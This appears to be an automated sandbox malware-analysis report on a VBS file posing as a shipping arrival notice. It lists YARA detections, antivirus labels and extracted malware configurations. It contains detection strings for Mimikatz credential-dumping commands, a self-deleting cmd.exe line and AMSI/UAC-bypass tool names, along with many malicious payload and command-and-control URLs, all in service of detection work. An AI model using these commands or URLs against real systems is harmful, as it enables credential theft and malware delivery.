38.3.MpSigStub.exe.138be22418a.26.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x477d0:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x185087:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
38.3.MpSigStub.exe.138be22418a.26.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x477d0:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
38.3.MpSigStub.exe.138be22418a.26.unpack	ROKRAT_Nov17_1	Detects ROKRAT malware	Florian Roth	0x48de16:$s1: \T+M\Result\DocPrint.pdb
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Vidar	Yara detected Vidar stealer	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_ByteLocker	Yara detected ByteLocker Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Artemon	Yara detected Artemon Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_lazparking	Yara detected LazParking Ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Jigsaw	Yara detected Jigsaw	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_GhostRat	Yara detected GhostRat	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
38.3.MpSigStub.exe.138be22418a.26.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x3feedf:$: OnlineTime= 0x3fef1d:$: clientpath= 0x3fef2c:$: serverpath=
38.3.MpSigStub.exe.138be22418a.26.unpack	gh0st	unknown	https://github.com/jackcr/	0x11a6e5:$b: Gh0st Update
38.3.MpSigStub.exe.138be22418a.26.unpack	NetWiredRC_B	NetWiredRC	Jean-Philippe Teissier / @Jipe_	0xe4f5b:$str4: [%s] - [%.2d/%.2d/%d %.2d:%.2d:%.2d] 0xbf154:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0xe4f63:$str5: %.2d/%.2d/%d %.2d:%.2d:%.2d 0x42fa9d:$klg8: [Home] 0x42fa87:$klg10: [Page Down] 0x42fa95:$klg11: [End] 0x1848b8:$klg15: [Print Screen] 0x3f0e1c:$klg15: [Print Screen]
38.3.MpSigStub.exe.138be4ca38f.133.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x1d687a:$xs1: WS2_32.dll 0x457325:$xs2: ReflectiveLoader
38.3.MpSigStub.exe.138be4ca38f.133.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x457325:$x1: ReflectiveLoader
38.3.MpSigStub.exe.138be4ca38f.133.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x1550a7:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
38.3.MpSigStub.exe.138be4ca38f.133.unpack	APT_PupyRAT_PY	Detects Pupy RAT	Florian Roth	0x30cb0e:$x1: reflective_inject_dll
38.3.MpSigStub.exe.138be4ca38f.133.unpack	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x38cfd0:$s1: "c" & "r" & "i" & "p" & "t"
38.3.MpSigStub.exe.138be4ca38f.133.unpack	SUSP_PDB_Path_Keywords	Detects suspicious PDB paths	Florian Roth	0x2fa566:$: Release\Shellcode 0x2fa56e:$: Shellcode.pdb
38.3.MpSigStub.exe.138be4ca38f.133.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x139ce3:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x139d3e:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x13a08a:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x13a0e5:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x13c38c:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
38.3.MpSigStub.exe.138be4ca38f.133.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x15283d:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x15285f:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
38.3.MpSigStub.exe.138be4ca38f.133.unpack	MAL_AirdViper_Sample_Apr18_1	Detects Arid Viper malware sample	Florian Roth	0x2ff0ba:$x1: cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del "%s" 0x2ff154:$x2: daenerys=%s& 0x2ff160:$x3: betriebssystem=%s&anwendung=%s&AV=%s 0x2ff136:$s1: Taskkill /IM %s /F & %s
38.3.MpSigStub.exe.138be4ca38f.133.unpack	HKTL_NET_NAME_AmsiBypass	Detects .NET red/black-team tools via name	Arnim Rupp	0x3ba191:$name: AmsiBypass 0x16fd8b:$compile: AssemblyTitle
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Pupy_Backdoor	Detects Pupy backdoor	Florian Roth	0x30cb0e:$x4: reflective_inject_dll 0x30cb0e:$x8: reflective_inject_dll 0x30cb0e:$x9: reflective_inject_dll(pid, dll_buffer, isRemoteProcess64bits)
38.3.MpSigStub.exe.138be4ca38f.133.unpack	TA17_293A_malware_1	inveigh pen testing tools & related artifacts	US-CERT Code Analysis Team (modified by Florian Roth)	0xa01be:$n1: file:// 0xba788:$n1: file:// 0x1783d5:$n1: file:// 0x2ac008:$n1: file:// 0xbac20:$ax2: 5.153.58.45
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2ee41:$s2: sekurlsa::wdigest 0x2ed72:$s6: sekurlsa::livessp 0x2edb7:$s9: sekurlsa::process 0x2edfc:$s12: sekurlsa::tickets 0x2ed2d:$s15: sekurlsa::credman
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Mimikatz_Strings	Detects Mimikatz strings	Florian Roth	0x2004b0:$x1: sekurlsa::logonpasswords
38.3.MpSigStub.exe.138be4ca38f.133.unpack	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x2c72e7:$pdb1: \ADPassHunt\ 0x2c72f8:$pdb2: \ADPassHunt.pdb 0x2c730c:$s1: Usage: .\ADPassHunt.exe 0x2c7328:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x2c7368:$s3: [ADA] Searching for accounts with userpassword attribute 0x2c73a5:$s4: [GPP] Searching for passwords now
38.3.MpSigStub.exe.138be4ca38f.133.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x311808:$r1: teSlortnoCtnerruC 0x3f3342:$r1: teSlortnoCtnerruC
38.3.MpSigStub.exe.138be4ca38f.133.unpack	ROKRAT_Nov17_1	Detects ROKRAT malware	Florian Roth	0x1e7c11:$s1: \T+M\Result\DocPrint.pdb
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Hancitor	Yara detected Hancitor	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_MegaCortex	Yara detected MegaCortex Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Avaddon	Yara detected Avaddon Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Marvel	Yara detected Marvel Ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Mimikatz_1	Yara detected Mimikatz	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
38.3.MpSigStub.exe.138be4ca38f.133.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x158cda:$: OnlineTime= 0x158d18:$: clientpath= 0x158d27:$: serverpath=
38.3.MpSigStub.exe.138be4ca38f.133.unpack	PoisonIvy_3	unknown	Kevin Breen <kevin@techanarchy.net>	0x208b96:$string1: CONNECT %s:%i HTTP/1.0 0x25b573:$string1: CONNECT %s:%i HTTP/1.0 0x25b5c8:$string2: ws2_32 0x25b602:$string3: cks=u 0x208c58:$string4: thj@h 0x25b4d0:$regvalue1: SOFTWARE\Classes\http\shell\open\command 0x24baf6:$regvalue2: Software\Microsoft\Active Setup\Installed Components\
Click to see the 449 entries

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://shdjhgftyhgjklolkjio.dns.navy/bcz/document.doc

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000005.00000002.15127086137.00000000022F0000.00000040.00000001.sdmp	Malware Configuration Extractor: GuLoader {"Payload URL": "http://178.32.63.50/mvbs/Host_hKVPgVgQ234.bin"}
Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	Malware Configuration Extractor: Metasploit {"Type": "Execute Command", "Command": "\u0001"}
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack	Malware Configuration Extractor: Pony {"C2 list": ["http://download.enet.com.cn/search.php?keyword=%s", "http://www.colegioarbitrosargentinos.com.ar/img/overdue-account/invoice-053541/", "http://ow.ly/QoHbJ", "http://santasalete.sp.gov.br/jss/", "http://www.redirserver.com/update4.cfm?tid=&cn_id=", "http://194.5.249.107/2nquxqz2ok4a45l.php", "http://www.youndoo.com/?z=", "http://%s%simg.jpg", "http://sonharvaleapena.com.br/en_us/copy_invoice/25680423862/dqzln-cwhrf_yagnf-spn", "http://vod.7ibt.com/index.php?url=", "http://microhelptech.com/gotoassist/", "http://malikberry.com/files101/htamandela.hta", "http://%domain%/update.php", "http://d.sogou.com/music.so?query=%s", "http://%s:%d/%s%d%08d", "http://%s:%i%s?mod=cmd", "http://pages", "http://www.zxboy.com#http://", "http://p.zhongsou.com/p?w=%s", "http://88888888.7766.org/ExeIni", "http://update.7h4uk.com:443/antivirus.php", "http://23.95.122.25/..-.-................-.....-------------/..............................................................................................dot\"targetmode=\"external\"/></relationships>", "http://flash.chinaren.com/ip/ip.php", "http://jump.qq.com/clienturl_15", "http://dialup.carpediem.fr/perl/countdialupinter.pl?", "http://www.piram.com.br/hosts.txt", "http://www.now.cn/?SCPMCID=", "http://110.42.4.180:", "http://club.book.sina.com.cn/booksearch/booksearch.php?kw=%s", "http://%76%2E%79%61%6F%36%33%2E%63%6F%6D/url.asp", "http://ajeyftrjqeashgda.mobi/mSsQDIMIQ/inIDw/", "http://www.cashon.co.kr/app/app.php?url=", "http://stats.hosting24.com/count.php", "http://192.189.25.17/cgbin/ukbros", "http://pig.zhongsou.com/helpsimple/help.htm", "http://zsxz.zhongsou.com/route/", "http://whatami.us.to/tc", "http://whenyouplaygood.com/s/gate.php?a\");f[\"\\x73\\x65\\x6e\\x64\"]();eval(f[\"responsetext\"", "http://23.249.163.163/qwerty.exe", "http://92.222.7.", "http://darkside", "http://so1.5k5.net/interface?action=install&p=", "http://www.gamedanji.cn/ExeIni", "http://gosgd.com", "http://find.verycd.com/folders?cat=movie&kw=%s", "http://search.dangdang.com/dangdang.dll?mode=1020&catalog=100&key1=%s", "http://216.172.172.40/~agora546/cardoso/dilma.zip", "http://www.cashon.co.kr/app/uninstall.php?", "http://www.moliv.com.br/stat/email0702/", "http://foo.w97.cn/data/file/kwbuf.ini", "http://chemgioaz.blogspot.com/ ", "http://init.icloud-analysis.com", "http://img.zhongsou.com/i?w=%s", "http://new.beahh.com/startup.php", "http://pznjaslo.pl/wp-content/outstanding-invoices/", "http://instamailserver.link/finito.ps1", "http://www.enquesta.tempsdoci.com/tracking-number-7fjs84476372436909/mar-13-18-04-02-56", "http://mp3.baidu.com/m?tn=baidump3lyric&ct=", "http://3dplayful.blogspot.com/ ", "http://stroyprivoz.ru/dokumente-vom-notar/", "http://a.pomf.cat/", "http://hotedeals.co.uk/ekck095032/", "http://www.iask.com/s?k=%s", "http://vidquick.info/cgi/", "http://gg", "http://speedmasterprinters.co.za/erroreng/erroreng/erroreng/erroreng/ii.php", "http://search.newhua.com/search.asp?Keyword=%s", "http://(www\|corail
Source: MpSigStub.exe.4180.38.memstrmin	Malware Configuration Extractor: CryLock {"Extensions": "%d str_charcodeat DosDateTimeToFileTime() failed, err = %d str_tolowercase String.prototype.toLowerCase() is not a constructor const pea_calls_unimplemented_api Intel(R) Core(TM)2 CPU T7200 @ 2.00GHz(MSI Stream %d)(Ole Stream %d)0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz._SSF:ScanAllStreamselement.getElementsByTagName() called on non-DOM objectcryptoMpCommon(Message.%zu: %hs - %hs)(Message.%zu)No subject%lld"}

Yara detected Arcane Stealer

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Predator

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected RevengeRAT

Show sources

Source: Yara match	File source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Pony

Show sources

Source: Yara match

File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected Baldr

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0af157.153.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd0acad5.154.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Multi AV Scanner detection for submitted file

Show sources

Source: Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs

ReversingLabs: Detection: 13%

Yara detected Njrat

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18300303304.00000138BE24D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18301189769.00000138BE6F1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Yara detected AveMaria stealer

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Multi AV Scanner detection for domain / URL

Show sources

Source: http://www.bonusesfound.ml/update/index.php	Virustotal: Detection: 13%			Perma Link
Source: http://110.42.4.180:	Virustotal: Detection: 13%			Perma Link

Source: 38.3.MpSigStub.exe.138be1deebe.25.unpack	Avira: Label: JS/Redirector.FX
Source: 38.3.MpSigStub.exe.138bcce283a.74.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce283a.167.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138be1deebe.15.unpack	Avira: Label: JS/Redirector.FX
Source: 38.3.MpSigStub.exe.138be26cad6.50.unpack	Avira: Label: TR/Patched.Ren.Gen2
Source: 38.3.MpSigStub.exe.138bde736d2.82.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack	Avira: Label: TR/Crypt.ZPACK.Gen

Location Tracking:

Yara detected Hancitor

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe

Code function: 45_2_00007FF7B582C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,

Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCg

Exploits:

Yara detected UACMe UAC Bypass tool

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138bde736d2.82.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: MpSigStub.exe PID: 4180, type: MEMORYSTR

Privilege Escalation:

Detected Hacktool Mimikatz

Show sources

Source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp

String found in binary or memory: blog.gentilkiwi.com/mimikatz

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Show sources

Source: Yara match	File source: 38.3.MpSigStub.exe.138be1461b6.106.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.63.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.71.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdd69a05.92.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be2a02c1.51.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.191.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.190.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcdb95a6.204.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bccd231a.165.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdd690b1.91.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bd51435e.70.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcdbabaa.205.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.74.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8f860a.87.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1459b2.104.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.213.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdd687dd.93.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be2939bd.52.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bdac8e06.95.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcd0731e.140.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce283a.167.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.72.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be8fa80e.86.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1451ae.105.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be1deebe.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be19fadd.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.168.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce32d4.166.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138bcce2d87.73.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000003.18294992845.00000138BE1C8000.00000004.00000001.sdmp, type: MEMORY
